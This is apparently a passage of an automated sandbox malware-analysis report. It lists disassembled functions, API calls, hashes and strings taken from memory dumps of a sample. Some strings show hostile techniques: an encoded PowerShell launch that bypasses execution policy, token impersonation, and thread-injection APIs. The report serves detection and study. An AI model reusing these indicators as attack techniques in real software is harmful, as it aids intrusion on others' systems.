                    • Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                    • Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
                    • Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
                    • Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: strtok$_getptd_time64malloc
                    • String ID: eThreadpoolTimer
                    • API String ID: 1522986614-2707337283
                    • Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                    • Instruction ID: 6b6eb52b04a315c801423870f2c32a99ef6710bb137d619f24a896f26e01ed9d
                    • Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
                    • Instruction Fuzzy Hash: F921D6B2A14BD485DB10DF52E0886AD77A8F7A8FE4B16426AEF5A83B41CF74C441C780
                    APIs
                    • malloc.LIBCMT ref: 00671FD2
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • _snprintf.LIBCMT ref: 00671FF1
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • remove.LIBCMT ref: 00671FFD
                    • remove.LIBCMT ref: 00672004
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
                    • String ID: %s\%s
                    • API String ID: 1896346573-4073750446
                    • Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                    • Instruction ID: e0e2b8aff05c8fda56302a13f39a6380ebc104d91b613d64687b117b274513b1
                    • Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
                    • Instruction Fuzzy Hash: 10F0E925208740C6D350AB51B81036AB366E784FC0F588134BF8C5BB16CE38C5528748
                    APIs
                    • malloc.LIBCMT ref: 001B13D2
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • _snprintf.LIBCMT ref: 001B13F1
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • remove.LIBCMT ref: 001B13FD
                    • remove.LIBCMT ref: 001B1404
                    Strings
                    • uld not open process: %d (%u), xrefs: 001B13D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
                    • String ID: uld not open process: %d (%u)
                    • API String ID: 2566950902-823969559
                    • Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                    • Instruction ID: a95d3efaa90c2af15f19040f1059ad5b508e251585c17898fc7696caa37f8ee5
                    • Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
                    • Instruction Fuzzy Hash: 6DF08261604B90D9D604AB12B8113EAB364E7A8FD0F9D4535FF8917B1ADF3CC5518744
                    APIs
                    • _snprintf.LIBCMT ref: 001ADB25
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                      • Part of subcall function 001B6F38: _snprintf.LIBCMT ref: 001B70A5
                    • _snprintf.LIBCMT ref: 001ADBBD
                      • Part of subcall function 001B2170: strchr.LIBCMT ref: 001B21D6
                      • Part of subcall function 001B2170: _snprintf.LIBCMT ref: 001B220C
                      • Part of subcall function 001B200C: strchr.LIBCMT ref: 001B2069
                      • Part of subcall function 001B200C: _snprintf.LIBCMT ref: 001B20B3
                    • _snprintf.LIBCMT ref: 001ADBD4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
                    • String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
                    • API String ID: 199363273-1250630670
                    • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                    • Instruction ID: 8d1d6e67d711b555cd00468b91f0abeea9f9fc8cd94810074212e067c41a4b5e
                    • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
                    • Instruction Fuzzy Hash: AD61BD36700B8596EB10DF62E8907EEB3A5F799B98F804126EE8E57B58DF78C505C700
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                    • Instruction ID: f2c5bbf88da8a699e662fc6f765ffd5b0472a53531a90afa3896da39091dbb55
                    • Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
                    • Instruction Fuzzy Hash: 1651E063B04A40D6EF40EB75D4412ED6362FB95B88F80D129EE0E2771AEF38D64AC744
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1640621425-0
                    • Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                    • Instruction ID: 5dfa00621e6b32b7e7e6c45174b9e572d81259c5b26a8d18c8109948671366af
                    • Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
                    • Instruction Fuzzy Hash: FC314E3230074047FFA8BE63555025EB653BB94FE0F188B249F6647B91E778D49A8744
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1640621425-0
                    • Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                    • Instruction ID: 48bfcc009182e69847d8196810102ae09eb5fa0f863c87d3263119f74cd34897
                    • Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
                    • Instruction Fuzzy Hash: 1831062130074486DE2C9E63DE506AAB651F754FE4F18863CDE6A47B91EB78D8878340
                    APIs
                    • malloc.LIBCMT ref: 0066553A
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • malloc.LIBCMT ref: 00665545
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D
                    • free.LIBCMT ref: 0066562C
                    • free.LIBCMT ref: 00665634
                    • free.LIBCMT ref: 00665640
                    • free.LIBCMT ref: 0066564D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc$AllocHeap
                    • String ID:
                    • API String ID: 996410232-0
                    • Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                    • Instruction ID: fa91a802676de7115477e7ecbe885dc73ce57f5083dfd6623bbf0d32d29fbd00
                    • Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
                    • Instruction Fuzzy Hash: 2E31F032304B8546EB16DB6A980176B6B5BF795BC8F898034DD5ACB722EE38C946C300
                    APIs
                    • malloc.LIBCMT ref: 001A493A
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • malloc.LIBCMT ref: 001A4945
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D
                    • free.LIBCMT ref: 001A4A2C
                    • free.LIBCMT ref: 001A4A34
                    • free.LIBCMT ref: 001A4A40
                    • free.LIBCMT ref: 001A4A4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$_errno$_callnewhmalloc
                    • String ID:
                    • API String ID: 2761444284-0
                    • Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                    • Instruction ID: ddfe11bee21fe91fe2ede919e1d28a075b0ed0327b27eca2dde5050658343c14
                    • Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
                    • Instruction Fuzzy Hash: EA31D0263147D587DF15DB2AA4107AE6B99FBE6BC8F0A8024DD568B711EF78C807C304
                    APIs
                      • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067322E
                      • Part of subcall function 006731F4: strchr.LIBCMT ref: 0067324C
                      • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673264
                      • Part of subcall function 006731F4: malloc.LIBCMT ref: 00673271
                      • Part of subcall function 006731F4: rand.LIBCMT ref: 0067333D
                    • strchr.LIBCMT ref: 00672DD6
                    • _snprintf.LIBCMT ref: 00672E0C
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • _snprintf.LIBCMT ref: 00672E23
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                    • String ID: %s&%s$?%s
                    • API String ID: 1095232423-1750478248
                    • Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                    • Instruction ID: 1fe48212a70a43d23a9b5d68317c628ddc730258e810a59962683c7a904eb9b7
                    • Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
                    • Instruction Fuzzy Hash: 92419262204E8191EA119F2ED1552E8A3B2FF98B99F089526DF8D57B20EF34D1B2C340
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                    • String ID:
                    • API String ID: 2998201375-0
                    • Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                    • Instruction ID: 0be63cf8f76dd2de07813188870e01f120d0accea70a650f284de5b6bec00889
                    • Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
                    • Instruction Fuzzy Hash: 8631A03220578086EB60AF55E580769BB66FB85FD0F188326EF8997F65DB38C881C701
                    APIs
                    • malloc.LIBCMT ref: 001AF085
                      • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                      • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                      • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                      • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                    • free.LIBCMT ref: 001AF0C0
                    • fwrite.LIBCMT ref: 001AF101
                    • fclose.LIBCMT ref: 001AF109
                    • free.LIBCMT ref: 001AF116
                      • Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$free$_callnewhfclosefwritemalloc
                    • String ID:
                    • API String ID: 1696598829-0
                    • Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                    • Instruction ID: 596a8a54152f7891fa982c53a1485843f2f04b7ac0077e255192b694276bbb64
                    • Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
                    • Instruction Fuzzy Hash: E4118265704B4081DE10F762E5513AE6392EBA5BE4F484239FE6E4BB8ADF3CC5068740
                    APIs
                    • _errno.LIBCMT ref: 0068A5FD
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 0068A5F5
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno_errno
                    • String ID:
                    • API String ID: 2964073243-0
                    • Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                    • Instruction ID: 9a5633fb553444a0838e3de5a66e580a6212c88d0cbfca2ea863417caaa9e619
                    • Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
                    • Instruction Fuzzy Hash: 26F02BB270060445EF097FA4C8A136C72539F51B32FA98306D9390B3D5E77D44D38712
                    APIs
                    • _errno.LIBCMT ref: 001C99FD
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • __doserrno.LIBCMT ref: 001C99F5
                      • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _getptd_noexit$__doserrno_errno
                    • String ID:
                    • API String ID: 2964073243-0
                    • Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                    • Instruction ID: 85ea3803c73946272d53637bb4f04510df937969011ab4b487b9e71251e7dd7d
                    • Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
                    • Instruction Fuzzy Hash: 9CF0F672751A4484EF092B74C8967AC7251ABB6F32FA6830DD629073D2C77CC8618710
                    APIs
                      • Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408
                    • strrchr.LIBCMT ref: 001B52ED
                    • _snprintf.LIBCMT ref: 001B539B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintfmallocstrrchr
                    • String ID: Failed to impersonate token: %d$t permissions in process: %d
                    • API String ID: 3587327836-1492073275
                    APIs
                    • CreatePipe.KERNEL32 ref: 006728A3
                    • GetStartupInfoA.KERNEL32 ref: 006728AD
                    • Sleep.KERNEL32 ref: 006728F4
                      • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 006748F1
                      • Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 00674932
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$CreateInfoPipeSleepStartup
                    • String ID: h
                    • API String ID: 1809008225-2439710439
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AccountInformationLookupToken_snprintf
                    • String ID: %s\%s
                    • API String ID: 2107350476-4073750446
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32 ref: 00688B8A
                    • __crtCapturePreviousContext.LIBCMT ref: 00688BA1
                    • __raise_securityfailure.LIBCMT ref: 00688C43
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CaptureContextFeaturePresentPreviousProcessor__crt__raise_securityfailure
                    • String ID: Pj
                    • API String ID: 2585579334-1109624870
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: RtlCreateUserThread$ntdll.dll
                    • API String ID: 1646373207-2935400652
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: NtQueueApcThread$ntdll
                    • API String ID: 1646373207-1374908105
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: IsWow64Process$kernel32
                    • API String ID: 1646373207-3789238822
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                    • API String ID: 1646373207-3900151262
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                    • API String ID: 1646373207-736604160
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                      • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B262E
                      • Part of subcall function 001B25F4: strchr.LIBCMT ref: 001B264C
                      • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2664
                      • Part of subcall function 001B25F4: malloc.LIBCMT ref: 001B2671
                      • Part of subcall function 001B25F4: rand.LIBCMT ref: 001B273D
                    • strchr.LIBCMT ref: 001B21D6
                    • _snprintf.LIBCMT ref: 001B220C
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • _snprintf.LIBCMT ref: 001B2223
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
                    • String ID: not create token: %d
                    • API String ID: 1095232423-2272930512
                    APIs
                    • malloc.LIBCMT ref: 00674A45
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • htonl.WS2_32 ref: 00674A5B
                      • Part of subcall function 00674C44: PeekNamedPipe.KERNEL32 ref: 00674C7C
                    • WaitForSingleObject.KERNEL32 ref: 00674AB6
                    • free.LIBCMT ref: 00674AF2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
                    • String ID:
                    • API String ID: 2495333179-0
                    APIs
                    • _time64.LIBCMT ref: 0067C254
                      • Part of subcall function 0068145C: GetSystemTimeAsFileTime.KERNEL32 ref: 0068146A
                      • Part of subcall function 0068044C: _getptd.LIBCMT ref: 00680454
                    • malloc.LIBCMT ref: 0067C29C
                    • strtok.LIBCMT ref: 0067C300
                    • strtok.LIBCMT ref: 0067C311
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Timestrtok$FileSystem_getptd_time64malloc
                    • String ID:
                    • API String ID: 460628555-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: clock
                    • String ID:
                    • API String ID: 3195780754-0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068F5FC
                      • Part of subcall function 00681600: _getptd.LIBCMT ref: 00681616
                      • Part of subcall function 00681600: __updatetlocinfo.LIBCMT ref: 0068164B
                      • Part of subcall function 00681600: __updatetmbcinfo.LIBCMT ref: 00681672
                    • _errno.LIBCMT ref: 0068F608
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _invalid_parameter_noinfo.LIBCMT ref: 0068F613
                    • strchr.LIBCMT ref: 0068F629
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                    • String ID:
                    • API String ID: 4151157258-0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001CE9FC
                      • Part of subcall function 001C0A00: _getptd.LIBCMT ref: 001C0A16
                      • Part of subcall function 001C0A00: __updatetlocinfo.LIBCMT ref: 001C0A4B
                      • Part of subcall function 001C0A00: __updatetmbcinfo.LIBCMT ref: 001C0A72
                    • _errno.LIBCMT ref: 001CEA08
                      • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                    • _invalid_parameter_noinfo.LIBCMT ref: 001CEA13
                    • strchr.LIBCMT ref: 001CEA29
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                    • String ID:
                    • API String ID: 4151157258-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
